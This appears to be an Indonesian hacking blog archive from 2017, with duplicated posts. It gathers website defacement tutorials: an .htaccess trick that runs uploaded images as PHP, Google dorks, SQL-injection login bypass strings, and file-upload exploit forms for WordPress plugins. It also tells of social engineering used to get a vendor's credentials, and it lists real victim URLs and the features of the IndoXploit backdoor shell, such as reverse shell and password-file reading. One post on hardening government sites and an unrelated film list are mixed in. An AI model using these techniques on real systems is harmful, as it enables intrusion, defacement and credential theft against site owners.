Recent post
Archive for Juni 2017
Halo , dipostingan kali ini saya ingin berbagi tentang bagaimana teknik ampuh saat tidak bisa upload backdoor.
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.
Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , jpg di baca oleh web server menjadi file php
Sumber : https://forum.surabayablackhat.org/d/154-teknik-ampuh-saat-tidak-bisa-upload-backdoor
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.
Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , jpg di baca oleh web server menjadi file php
AddType application/x-httpd-php .shor7cut
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
nah kalau sudah terupload , silahkan upload file .jpg , png atau pun .txtSumber : https://forum.surabayablackhat.org/d/154-teknik-ampuh-saat-tidak-bisa-upload-backdoor
Ada beberapa macam bypass shell upload yg dapat kita gunakan ketika kita akan mengeksekusi suatu web, dan ini beberapa tehnik yang saya ketahui
Grets : azzatssins
- Exif
- Tamper data
- Live HTTP Header
- ImageTragick
- BurpSuite
- Upload .htaccess (penambahan fitur php pada ext baru) > upload shell
Grets : azzatssins
alat tempur:
1.dork
2.kopi
3.sabar
4.file bergambar jpg , png dll
oke pertama masukan dork : index of jbimages/ or
Index of /jbimages site:desa.id
next cari tulisan dialog-v4.htm *note kalau file di upload selain tulisan sukses brati g vuln oke lanjut
oke upload file bergambar nya *note file selain bergambar , tidak bisa di upload oke next
nah, complete kan sekarang kita harus mencari dimana letak file gambar kita yg kita upload tadi, biasanya di assets/images/ xD *note : dir gambar setiap web berbeda beda jadi berpikir sedikit untuk mencari file bergambar kita xD
Halo ini adalah post pertama saya di website ini,perkenalkan nama saya putra A.K.A SPEEDY-03 hehehe,kali ini saya akan membagikan tutorial social engineering (SOCENG),apa sih itu soceng?Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi atau menguak suatu informasi rahasia. �Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Tidak ada sistem komputer yang tidak melibatkan interaksi manusia. < wikipedia
baiklah soceng model kami itu berbeda dengan yang lain karena saya mencari salah satu jasa pembuat website dahulu lalu mulai soceng,oke langsung saja simak percakapan saya dengan costumer chat,disini saya menggunakan nama palsu dengan Suryanto
*MARI MULAI SOCENG
saya:permisi??
costumer:halo selamat datang ada yang bisa kami bantu?
saya:pak apakah disini menyediakan layanan website untuk berbisnis online?
costumer: iya ada pak.
*DISINI GUA NANYAIN HARGA BIAR COSTUMER ITU GAK CURIGA.
*dan disini gua minta demo salah satu websitenya
dan lanjut
saya:kok indowebplus jadi ke sidoarjo pak? NB:SAYA PURA PURA BINGUNG BIAR TIDAK DI CURIGAI
costumer:Untuk sidoarjo web adalah salah satu website kami pak.Salah satu grup perusahaan kami.
*SAYA DISINI MINTA DEMO LOGINNYA
KWOAKWOA BELUM APA APA UDAH DIKASIH USERNAME SAMA PASSWORD
saya:mana websitenya pak? < maksudnya demo login websitenya
*AND GOTCHA.DISINI SAYA LANTAS KAGET KARENA SAYA DIBERIKAN AKSES USERNAME DAN PASSWORD DARI PEMBUAT JASA WEBSITE TADI
*DAN SAYA LOGIN DAN SAYA UPLOAD SHELLNYA HEHEHE
AND GOTCHA KWKWKW
*HASILNYA
https://sidoarjoweb.com/galo.htm
https://nusantaraperdana.co.id/galo.htm
https://insindo.net/galo.htm
SEBELUMNYA SAYA MINTA MAAF KALO TUTORIAL INI BELUM JELAS ATAU ACAK ACAKAN KWKWK BYEEEE�
MIRRORNYA KWKW
https://defacer.id/archive/attacker/speedy-03
Sumber : https://blog.speedy-id.net/2017/06/18/tutorial-social-engineering-soceng/
baiklah soceng model kami itu berbeda dengan yang lain karena saya mencari salah satu jasa pembuat website dahulu lalu mulai soceng,oke langsung saja simak percakapan saya dengan costumer chat,disini saya menggunakan nama palsu dengan Suryanto
*MARI MULAI SOCENG
saya:permisi??
costumer:halo selamat datang ada yang bisa kami bantu?
saya:pak apakah disini menyediakan layanan website untuk berbisnis online?
costumer: iya ada pak.
*DISINI GUA NANYAIN HARGA BIAR COSTUMER ITU GAK CURIGA.
*dan disini gua minta demo salah satu websitenya
dan lanjut
saya:kok indowebplus jadi ke sidoarjo pak? NB:SAYA PURA PURA BINGUNG BIAR TIDAK DI CURIGAI
costumer:Untuk sidoarjo web adalah salah satu website kami pak.Salah satu grup perusahaan kami.
*SAYA DISINI MINTA DEMO LOGINNYA
KWOAKWOA BELUM APA APA UDAH DIKASIH USERNAME SAMA PASSWORD
saya:mana websitenya pak? < maksudnya demo login websitenya
*AND GOTCHA.DISINI SAYA LANTAS KAGET KARENA SAYA DIBERIKAN AKSES USERNAME DAN PASSWORD DARI PEMBUAT JASA WEBSITE TADI
*DAN SAYA LOGIN DAN SAYA UPLOAD SHELLNYA HEHEHE
AND GOTCHA KWKWKW
*HASILNYA
https://sidoarjoweb.com/galo.htm
https://nusantaraperdana.co.id/galo.htm
https://insindo.net/galo.htm
SEBELUMNYA SAYA MINTA MAAF KALO TUTORIAL INI BELUM JELAS ATAU ACAK ACAKAN KWKWK BYEEEE�
MIRRORNYA KWKW
https://defacer.id/archive/attacker/speedy-03
Sumber : https://blog.speedy-id.net/2017/06/18/tutorial-social-engineering-soceng/
Halo gan welcome back with me speedy-03,Kali ini gua akan share tutorial deface yaitu chat manager hehehe,metode ini sangat mudah simpel bagi orang noob kaya saya.
OKE LETS DO IT
sumber : https://blog.speedy-id.net/2017/06/18/cara-deface-dengan-chat-manager/
OKE LETS DO IT
- Pertama kalian pergi ke website https://ipuipuweb.com/ lalu klik chattingan di bawah button (Hubungi Kami,Chat Online,DSB)
- Setelah kalian klik kalian gambar kaya kawat gitu mungkin gua gak tau :v nih gambarnya
- Setelah itu kalian upload script deface dengan extensi .htm
- Dan kalian klik file kalian yang ada di chat tersebut�.dan tara hasilnya �
sumber : https://blog.speedy-id.net/2017/06/18/cara-deface-dengan-chat-manager/
# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=
# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin
http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com
NB : ini poc bisa di pake sql / bypass admin
# Google Dork: inurl:ewt_news.php?nid=
# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin
http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com
NB : ini poc bisa di pake sql / bypass admin
Vendor:www.indexdream.com
Go To Google Search :intext:"Dise�o INDEX Dream"
Enter To The Target
Admin Panel:htm/administrador.php
User: '=' 'or'
Password: '=' 'or'
Demo:
http://www.tramitesuvisa.co/htm/administrador.php
http://www.cootraesturz.com/htm/administrador.php
Upload Image Demo:
http://www.cootraesturz.com/imagenes/home/1.jpg
Go To Google Search :intext:"Dise�o INDEX Dream"
Enter To The Target
Admin Panel:htm/administrador.php
User: '=' 'or'
Password: '=' 'or'
Demo:
http://www.tramitesuvisa.co/htm/administrador.php
http://www.cootraesturz.com/htm/administrador.php
Upload Image Demo:
http://www.cootraesturz.com/imagenes/home/1.jpg
# Exploit Title: SAUDI SOFTECH Admin Login Page Bypass | Upload shell access
# Google Dork : intext:"Designed By: SAUDI SOFTECH (MST)"
# Date:2017-06-14
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
Install NoRedirect Plugin to FireFox
Add your target url to NoRedirect plugin and pervent Redirect
than you can use :
target.com/panel/users.php ---> to add or remove or edit user
target.com/panel/pages.php ---> to add or remove or edit pages
target.com/panel/file.php ---> to add or remove or edit files ( you can upload shell :D )
############################
Demo:
http://www.und-ksa.com/panel/
http://www.madicc.org/panel/
http://www.tisco.com.sa/panel/
http://www.speetech.net/panel/
...
#############################
#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||
And All Of Iranian Anonymous .
# Google Dork : intext:"Designed By: SAUDI SOFTECH (MST)"
# Date:2017-06-14
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
Install NoRedirect Plugin to FireFox
Add your target url to NoRedirect plugin and pervent Redirect
than you can use :
target.com/panel/users.php ---> to add or remove or edit user
target.com/panel/pages.php ---> to add or remove or edit pages
target.com/panel/file.php ---> to add or remove or edit files ( you can upload shell :D )
############################
Demo:
http://www.und-ksa.com/panel/
http://www.madicc.org/panel/
http://www.tisco.com.sa/panel/
http://www.speetech.net/panel/
...
#############################
#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||
And All Of Iranian Anonymous .
# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7
1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/
2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html
Indonesian h4x0r.
# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7
1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/
2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php
Indonesian h4x0r.
Subdomain Kementerian Kesehatan Di Hack � Mungkin karena ingin melampiaskan kekecewaan gara gara ditikung teman sendiri, hacker dengan kodenama E7b_404 meretas subdomian situs Kementerian Kesehatan. Setidaknya, ada tiga subdomain Kemkes yang berubah tampilan.
Berikut daftar subdomain Kementerian Kesehatan yang berhasil diretas atau dideface oleh pelaku :
- http://sehat-jiwa.kemkes.go.id/clients/
- http://tradkom.kemkes.go.id/wp-content/
- http://kesga.kemkes.go.id/images/
Hallo Pak Kementerian Kesehatan
Hati Saya Sedang Tidak Sehat (Galau) Karena Teman Saya Menikung Saya Dari Belakang
Berikan Saya Kesehatan Untuk Mengobati Hati Saya Yang Terluka Ini
Hati Saya Sedang Tidak Sehat (Galau) Karena Teman Saya Menikung Saya Dari Belakang
Berikan Saya Kesehatan Untuk Mengobati Hati Saya Yang Terluka Ini
Tak Banyak Yang Dapat Aku Lakukan Selain Melihat Apa Yang Telah Aku Perjuangkan Selama Ini Sia Sia
Selain itu pelaku juga meninggalkan email yang bisa dihubungi di alamat sulispurnama55@gmail.com .Selain itu beberapa nick lain juga terpampang yang sepertinya teman dari pelaku.
Yukinoshita47, _Tuan2Fay_, Lyonc, Snooze, Anazvr, Loyo-ID
Sampai berita ini dirilis, belum ada perbaikan dari situs terkait. Namun mirror dari ketiga subdomain Kementerian Kesehatan yang di hack bisa kalian lihat disini :
- http://mirror-h.org/browse/792035/
- https://defacer.id/archive/mirror/378958
- https://defacer.id/archive/mirror/378959
sumber : https://news.linuxsec.org/situs-kementerian-kesehatan-dihack/
Hacker Tantang Polisi Cyber � beberapa waktu lalu Bareskrim Polri menangkap pelaku peretasan situs Dewan Pers. Anehnya bukan merasa takut, hacker dengan kodenama mirav dan SPEEDY-03 malah meretas tujuh subdomain milik Kepolisian RI dan meninggalkan pesan yang terkesan menantang polisi cyber.
Berikut list subdomain Polri yang diretas oleh pelaku :
- http://ntb.sipp.polri.go.id/personel/
- http://jabar.sisbinkar.polri.go.id/personel/photo/
- http://kalsel.sisbinkar.polri.go.id/personel/
- http://kalsel.sipp.polri.go.id/personel/
- http://bareskrim.sipp.polri.go.id/personel/
Selain subdomain Polri diatas, pelaku juga meretas situs Polda Kepri di alamat http://kepri.sisbinkar.net/personel/ dan situs Polda Sulteng di alamat https://www.binkarsulteng.com/ .
Berikut pesan yang ditinggalkan oleh pelaku :
hacked by mirav w/ SPEEDY-03
Ice-cream-ren-mikulacur
contact : dirin@polri.go.id
police cyber ? i think that is bullshit #SAVEINDONESIA
Ice-cream-ren-mikulacur
contact : dirin@polri.go.id
police cyber ? i think that is bullshit #SAVEINDONESIA
Selain itu di halaman situs yang diretas juga nampak gambar burung garuda berwarna merah dan backsound Gugur Bunga. Dari pesan yang ditinggalkan kemungkinan tindakan ini berkaitan dengan kasus penangkapan M2404 beberapa waktu lalu.
Sampai berita ini diturunkan situs situs yang diretas belum diperbaiki.sumber : https://news.linuxsec.org/2017/06/hacker-tantang-polisi-cyber.html
IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.
Contoh command untuk memanggil tools 'Adminer' |
Login Shell, default password: IndoXploit |
[ List Tools - IndoXploit Shell Backdoor V.3 ]
=============================================
**** COMMAND BASED *****
- Read File
usage: rf [filename]
example: rf /etc/passwd
- Spawn File/Tools
usage: spawn [name]
[name]
- Adminer (adminer)
- WebConsole (webconsole)
- CGI Telnet 1 (cgitelnet1)
- CGI Telnet 2 (cgitelnet2)
- PHPINFO (phpinfo)
example:
spawn adminer
spawn webconsole
spawn cgitelnet1
- Symlink
usage: symlink *[bypass]
[bypass]
- 404
example: symlink 404
- Reverse Shell
[Back Connect]
usage: rvr bc [IP] [PORT] [TYPE]
example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl
[Bind Port]
usage: rvr bp [PORT] [TYPE]
example:
rvr bp 1337 bash
rvr bp 1337 perl
- KRDP - Create RDP Account (for windows server only)
usage: krdp
- Logout From Shell
usage: logout
- Kill Backdoor
usage: killme
=============================================
- Jumping
- Config Grabber
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit
----------------------------
#Link Download: Download
---------------------------
###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.
Greetz:
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks:
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################
Sumber : http://www.indoxploit.or.id/2017/06/indoxploit-shell-first-edition-v3.html
Alasan Kenapa Website Pemerintah Mudah di Deface - LuqmanSeoFriendly |
Yo! seperti di judul. kali ini saya akan membahas kenapasih website pemerintah kita ini mudah di deface?
Mari kita pelajari sedikit demi sedikit, kemungkinan hal ini akan berkembang menjadi lebih lebar lagi.
Kita telaah dari sisi Defacer & Webmaster :
Defacer setiap hari selalu mencari celah keamanan website agar bisa di deface, melakukan penelitian terhadap sourcecode yang ada, melihat update vulnerability dari website-website security yang ada di jagad raya. Berdiskusi di forum untuk menemukan dan memecahkan sesuatu yang tidak bisa dipecahkan. Hal inilah yang biasanya hampir tidak pernah dilakukan oleh Webmaster & Administrator. Defacer, bisa saja terdiri dari banyak orang yang berbeda-beda dan berasal dari lokasi mana saja di dunia ini, misalkan: Indonesia, Turki, Brazil, India, Tunisia, dsb. Oleh sebab itu bisa kita golongkan bahwa defacer merupakan sebuah kumpulan orang banyak.
Administrator / Webmaster biasanya terdiri dari beberapa orang saja, bisa 1-3 orang saja. Administrator / Webmaster bertugas untuk mengatur dan mengurus website. Namun, entah kenapa kebanyakan webmaster & administrator website pemerintah Indonesia kebanyakan menggunakan layanan instant public (hosting, opensource cms, dsb), alangkah baiknya bila situs-situs pemerintah memiliki suatu badan tersendiri yang mengurusi hal ini (dalam bayangan).
Dari penjelasan di atas, terdapat beberapa kelebihan Defacer daripada Webmaster:
1. Defacer unggul dalam jumlah, karena defacer bisa siapa saja di dunia ini.
2. Defacer bergerak setiap hari mengikuti perkembangan security.
3. Defacer mencoba dan melakukan research terdahap kelemahan-kelemahan di website setiap saat.
Kita bisa melihat beberapa website pemerintah Indonesia yang di hack disini:
http://zone-h.org/archive/filter=1/domain=go.id/fulltext=1/page=1
Ada beberapa alasan mengapa website pemerintah mudah di deface:
1. Penggunaan CMS yang free dan opensource tanpa adanya modification. Sehingga keseluruhan konfigurasi menggunakan default konfigurasi, hal ini memudahkan para defacer untuk menemukan informasi file, directory, source, database, user, connection, dsb.
2. Tidak updatenya source atau tidak menggunakan versi terakhir dari CMS. Hal ini sangat rentan, karena security issue terus berkembang seiring masuknya laporan dan bugtrack terhadap source, kebanyakan hal inilah yang menjadi sebab website mudah dideface.
3. Tidak pernah ada research yang mendalam dan detail mengenai CMS sebelum digunakan & di implementasikan. Sehingga pemahaman dan pengetahuan dari webmaster hanya dari sisi administrasinya saja, tidak sampai ke level pemahaman sourcecode.
4. Tidak adanya audit trail atau log yang memberikan informasi lengkap mengenai penambahan, pengurangan, perubahan yang terjadi di website baik source, file, directory, dsb. Sehingga kesulitan untuk menemukan, memperbaiki dan menghapus backdoor yang sudah masuk di website.
5. Jarang melakukan pengecekan terhadap security update, jarang mengunjungi dan mengikuti perkembangan yang ada di situs-situs security jagad maya. Sehingga website sudah keduluan di deface oleh defacer sebelum dilakukan update dan patch oleh webmaster.
6. Kurangnya security awareness dari masing-masing personel webmaster & administrator. Sehingga kewaspadaan terhadap celah-celah keamanan cukup minim, kadangkala setelah website terinstall dibiarkan begitu saja. Kurangnya training dan kesadaran akan keamanan website seperti ini akan menjadikan website layaknya sebuah istana yang tak punya benteng.
Berikut screenshoot Dari Zone-H.Org OpenSource CMS yang memiliki vulnerability
Vulnerability OpenSource CMS By Telematika.Co.IdVulnerability OpenSource CMS By Joomla.Org � Joomla 1.5
Untuk teman-teman Webmaster / Administrator website pemerintah, ada beberapa saran yang mungkin bermanfaat untuk dapat di implementasikan:
1. Wajib untuk mengikuti perkembangan source dari source website yang digunakan, backuplah website dan database sebelum dilakukan update.
2. Kebanyakan defacer telah memasang backdoor ketika telah berhasil melakukan deface website, hal ini dimungkinkan agar dapat melakukan deface ulang terhadap website. Wajib untuk memeriksa perubahan folder, file, database dan source terakhir dari website.
3. Pelajarilah lebih dalam mengenai dasar-dasar hacking dan antisipasinya (RFI, LFI, CSRF, SQL Injection, XSS, Exploit, Dsb) karena artikel ini sudah banyak bertebaran di Internet. Semakin banyak tahu & mengerti tentang sebuah kelemahan website dari dasar-dasar hacking, maka akan semakin banyak tahu pula bagaimana cara mengatasinya.
4. Sering-seringlah berdiskusi di forum dan milist yang berkaitan dengan perangkat serta aplikasi yang mensupport website anda, baik dari sisi operating system, tempat hosting, bugtrack milist, developer milist, dsb. Hal ini bertujuan agar informasi vulnerability dapat dipatch lebih cepat sebelum defacer beraksi.
5. Hardening website dan source wajib dilakukan, misalkan jangan menggunakan �default configuration�, aturlah sedemikian rupa �configuration website� dengan memperhatikan: permission, access level, indexing, database connection, database configuration, password dan user management.
6. Gunakanlah tambahan plugin / component yang tepat, sehingga dapat meminimalisasi terjadinya kegiatan defacing dari thirdparty. Pastikan hasil review & ranking plugin bereputasi baik dan sudah di verified oleh penyedia CMS yang bersangkutan.
7. Lakukanlah penetration testing terhadap website, baik secara lokal maupun langsung di website. Banyak tools penetration testing yang bisa digunakan: Nexus, Acunetix, dsb. Tapi yang paling bagus dan lebih cepat adalah, copy source dan database website, Install di local computer, kemudian lakukanlah penetration testing. Updatelah website bila ditemukan vulnerability.
8. Backdoor, baik (php, asp, perl, phyton) dikenali dengan baik oleh beberapa Antivirus, ada bisa cleaning dengan melakukan scanning terhadap source website secara local. Apabila tidak dikenali, terpaksa anda harus mencari secara manual.
Pada bagian ini, saya akan mencoba memberikan salah satu solusi apabila website sudah terlanjur dideface, silakan menggunakan langkah berikut:
1. Download source & database yang ada di website untuk backup. Hal ini untuk berjaga-jaga apabila langkah yang kita lakukan gagal, tetapi apabila konfigurasi & file benar dan lengkap dijamin 100% berhasil, terkecuali ada sesuatu yang terlewatkan.
2. Download source CMS versi terbaru dari website penyedia CMS, misalkan: www.drupal.org, www.joomla.org, www.wordpress.org, dsb.
3. Lakukanlah perbaikan database secara lokal, berjaga-jaga apabila backdoor ada di database. Biasanya didalam database ada access user tidak dikenal yang akses levelnya sama dengan Administrator.
4. Install CMS yang tadi sudah di download di web hosting. Kemudian lakukanlah konfigurasi: database, file permission, directory permission. Jangan menggunakan default configuration, modifikasilah konfigurasi-konfigurasi yang ada agar lebih powerfull.
5. Kemudian instalasi component: Themes, Plugin, Component, dsb. Gunakanlah yang paling update, atau source baru dari komponen yang akan di Install (Fresh Install Component).
6. Kemudian update database, dengan login ke Database Control Panel (phpMyAdmin, DB Admin, cPanel Database, dsb). Setelah anda melakukan login, maka importlah database.
7. Gantilah username Administrator & Password menggunakan nama yang lebih Unik, jangan menggunakan user (admin, administrator, adm1n, dsb) gunakanlah yang lebih powerful dan susah untuk di tebak untuk menghindari bruteforce, gunakanlah alias untuk menampilkan username administrator di web content.
Semoga sedikit sharing mengenai keamanan website ini berguna buat para sahabat-sahabat Webmaster & Administrator Website.
10 Film Tentang Game Ini Wajib Ditonton Gamer Sejati - Luqmanseofriendly |
Sebelumnya sudah banyak dibahas bagaimana para pecinta coding dan dunia hacker dimanjakan dengan banyaknya film bertema serupa, bahkan dibuat dengan sangat apik. Lantas bagaimana untuk para gamer? Apakah ada film yang bertema serupa?
Sebenarnya ada banyak film bertema game di dunia. Namun, hanya beberapa yang benar - benar bagus dan dibuat dengan begitu serius, tak jarang tema ini digabung dengan tema lainnya. Kali ini Jaka telah mengumpulkan 10 Film Tentang Gamer yang Wajib Ditonton Para Pecinta Game. Berikut ulasannya.
10 Film Tentang Game Ini Wajib Ditonton Gamer Sejati
1. WarGames
Ketika mencoba untuk meng-hack software video game dari sebuah perusahaan, anak SMA ajaib David secara tidak sengaja membuat kesalahan dan malah terhubung ke komputer rahasia di Pentagon. Yang mana telah di program untuk menghilangkan kesalahan dan emosi manusia dan telah mengontrol penuh atas seluruh senjata nuklir Amerika Serikat.
Komputer telah dilatih untuk membuat keputusan tertentu dengan menerapkan simulasi permainan yang berbeda. David dan temannya Jenifer, menganggap itu sebuah video game baru bernama Global Thermonuclear World, yang benar-benar menggerakan komputer untuk membuat keputusan taktis dalam kehidupan nyata. Berdasarkan keinginan pemain dalam game tersebut, komputer siap meluncurkan bom ke Uni Soviet.
Begitu David menyadari bahwa permainannya berpotensi menimbulkan masalah besar di antara negara-negara, ia akhirnya mengajarkan komputer melalui beberapa permainan tic-tac-toe dan beberapa permainan yang tidak dapat dimenangkan. Kemudian komputer mengetahui bahwa penggunaan senjata nuklir tidak akan mengarah kepada kemenangan pemain. Akhirnya itu pun menghentikan rencana peluncuran nuklir tersebut.
2. The king of Kong
Tahun 80-an kala itu game lebih terkenal dan populer dalam mesin arcade. Seperti halnya Messi dan Ronaldo, dunia game saat itu juga menampilkan persaingan antara dua orang gamer terhebat dalam memainkan sebuah game legendaris, yaitu Donkey Kong. Mitchel seorang pemilik restoran yang terkenal sebagai rajanya Donkey Kong, di mana ia memegang rekor tertinggi dunia dalam permainan tersebut. Ia pun dijuluki 'Sauce King of Florida karena ia juga sukses dalam penjualan saus panas buatannya.
Pesaingnya bernama Steve Wiebe merupakan seorang insinyur yang ingin membuktikan bahwa ia juga bisa mendapatkan skor tertinggi. Menggunakan pengetahuan matematika untuk mengidentifikasi pola dan interval waktu tertentu dalam permainan. Diketahui kedua skor mereka tidak jauh berbeda, mereka sama-sama memegang skor di atas 1 juta poin.
3. Free to Play The Movie
Sebuah film dokumenter yang dirilis oleh Valve, menceritakan tentang kehidupan para gamer Dota 2, di mana berpusat kepada kisah dari 3 orang gamer profesional. Film ini akan mengupas tuntas mengenai kehidupan dan perjalanan menjadi gamer profesional dari Benedict 'HYHY Lim, Danil 'DENDI' Ishutin dan Clinton 'FEAR' Loomis.
Bagi kamu yang mengaku gamer, khususnya untuk game MOBA DotA 2, kamu harus menonton kisah dari ketiga gamer pro ini, yang sangat memotivasi dan emosional. Bahkan IMDB memberikan nilai rating hingga 8,1.
4. All Work All Play
Masih dari film dokumenter kali ini berkisah tentang bagaimana gamer profesional dalam industri game yang sebenarnya. Segala aspek benar-benar disorot dalam film ini, mulai dari tim-tim dunia, game dari semua tier, pendapatan dan masih banyak lagi. Film yang dirilis tahun 2015 ini berdurasi 94 menit yang disutradarai oleh Patrick Creadon. Bagi kamu yang bercita-cita menjadi gamer profesional, kamu tidak boleh melewatkan film satu ini.
5. The Last Starfighter
Siapa yang pernah menyangka bahwa menghabiskan berjam-jam dalam bermain sebuah video game ternyata menjadi sebuah persiapan untuk membantu ras alien dalam sebuah perang antar galaksi. Itulah yang dialami oleh Alex Rogan dalam film The Last Starfighter, di mana ia sangat menguasai permainan favoritnya Starfighter dalam mesin arcade dan menjadi pemain dengan nilai tertinggi.
Karena kemampuannya itu para alien dari planet Rylos, terpincut untuk menggunakan kemampuan Alex yang dapat membantu mengalahkan kekaisaran ras alien yang jahat. Alex pun harus bertarung di luar angkasa sebagai harapan terakhir dari seluruh galaksi untuk mencegah monopoli kekuasaan dari alien jahat.
6. Stay Alive
Siapa bilang video game tidak dapat digabungkan dengan genre film menakutkan. Justru ternyata penggabungan tema ini menjadi sesuatu yang beda dan menarik dalam film Stay Alive. Berkisah tentang sebuah permainan yang berjudul sama dengan filmnya, Stay Alive ternyata bukan sebuah video game biasa, melainkan ia dapat terhubung dengan dunia nyata. Dimainkan secara online multiplayer, pemain yang kalah di dalam permainan akan mengalami nasib yang sama di dunia nyata. Begitu juga dengan cara kematiannya.
7. New Police Story
Seorang aktor terkenal Jackie Chan pun pernah mengangkat game sebagai tema franchise film legendaris nya, yaitu New Police Story. Masih berperan menjadi polisi handal, Jackie Chan harus menghadapi para perampok jenius yang menggunakan program game untuk menjebak dan membunuh para polisi. Bahkan setelah rencana mereka berhasil, game tersebut pun didistribusikan ke seluruh daratan Cina, di mana bukan bertujuan untuk mengambil sebuah keuntungan, melainkan untuk mengolok-olok kepolisian yang tak dapat menangkap mereka.
8. The Wizard
The Wizard menceritakan kisah Corey dan Jimmy, anak jenius dalam permainan video game. Di mana mereka bersama Haley melakukan perjalanan untuk memasuki Video Armageddon, sebuah turnamen dengan hadiah uang tunai 500 juta rupiah. Dalam perjalanannya mereka juga bertemu dengan para gamer di sepanjang jalan dan mereka harus bertanding dengan para gamer tersebut. hingga pada akhirnya mereka pun sampai ke turnamen Video Armageddon.
9. Arcade
Mengkisahkan sebuah video game virtual reality yang diberi judul Arcade. CEO game ini memberikan konsol secara gratis kepada semua peserta yang beruntung. Sayangnya mereka sebenarnya tidak seberuntung itu, karena ternyata pemain tersebut harus terkunci dan terpenjara di dunia maya dan pikiran mereka diambil alih oleh game tersebut, yang juga sebenarnya dihantui oleh hantu seorang anak yang jahat.
Dengan merekrut programmer permainan untuk membantu para remaja yang mencoba menyelamatkan teman-teman mereka yang lain. Namun, akhirnya mereka juga melepaskan hantu anak tersebut ke dunia nyata pada saat bersamaan.
10. Pixel
Meski bergenre komedi sci-fi 3D, film ini justru mempunyai tema yang serius, tentang penyelamatan dunia dari serangan alien yang menyerupai karakter-karakter yang ada di dalam game arcade tahun 80-an. Presiden Will Cooper yang dulunya juga seorang gamer, meminta bantuan sahabat kecilnya bernama Sam Brenner, seorang juara video game pada tahun 1980. Sam harus memimpin sebuah tim untuk melawan dan mengalahkan para alien dengan menggunakan kemampuan bermain game yang mereka miliki.
# Exploit Title : mktbagold Uploader Exploit
# Exploit Author : Persian Security Team
# Vendor Homepage : http://www.mktbagold.com/
# Google Dork 1 : Powered by: MktbaGold 6.6 site:*.sa
# Google Dork 2 : Powered by: MktbaGold 6.6
# Date: 2017-06-09
# Tested On : ubuntu14.04 , windows 10
# Version : 6.6
######################
#describ and exploit :
[+] find a target with dork
[+] Exploit the websites
http://localhost/upload.php
[+] upload pic
######################
demo :
https://magrabi.net/upload.php
